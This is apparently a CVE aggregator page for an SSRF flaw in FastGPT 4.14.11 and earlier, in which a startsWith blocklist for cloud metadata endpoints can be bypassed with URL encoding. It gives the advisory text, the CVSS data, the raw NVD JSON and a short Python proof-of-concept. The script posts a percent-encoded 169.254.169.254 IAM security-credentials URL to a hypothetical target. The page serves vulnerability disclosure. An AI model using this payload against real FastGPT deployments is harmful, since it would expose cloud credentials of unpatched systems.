CVE-2026-42345

Description

FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FastGPT <= 4.14.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target: Vulnerable FastGPT instance endpoint (Hypothetical)
target = "http://vulnerable-fastgpt-instance/api/chat"

# Bypass technique: URL encoding the Cloud Metadata IP
# 169.254.169.254 encoded as %31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34
bypass_url = "http://%31%36%39%2E%32%35%34%2E%31%36%39%2E%32%35%34/latest/meta-data/iam/security-credentials/"

payload = {
    "url": bypass_url,
    "other_params": "..."
}

try:
    response = requests.post(target, json=payload)
    if response.status_code == 200:
        print("[+] Potential SSRF successful!")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42345
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42345
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42345/
[4] VulDB https://vuldb.com/cve/CVE-2026-42345
[5] https://github.com/labring/FastGPT/security/advisories/GHSA-jhqw-944x-xh94

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42345", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:37.320", "lastModified": "2026-05-08T23:16:37.320", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastGPT is an AI Agent building platform. In versions 4.14.11 and prior, FastGPT's isInternalAddress() function in packages/service/common/system/utils.ts blocks cloud metadata endpoints using a fullUrl.startsWith() check against a hardcoded list. This check can be bypassed using at least 7 different URL encoding techniques, all of which resolve to the same cloud metadata service but do not match the blocklist patterns. Additionally, the broader private IP check (isInternalIPv4/isInternalIPv6) is disabled by default because CHECK_INTERNAL_IP defaults to false (not 'true'), so these bypasses reach the metadata endpoint without any further validation. At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/labring/FastGPT/security/advisories/GHSA-jhqw-944x-xh94", "source": "[email protected]"}]}}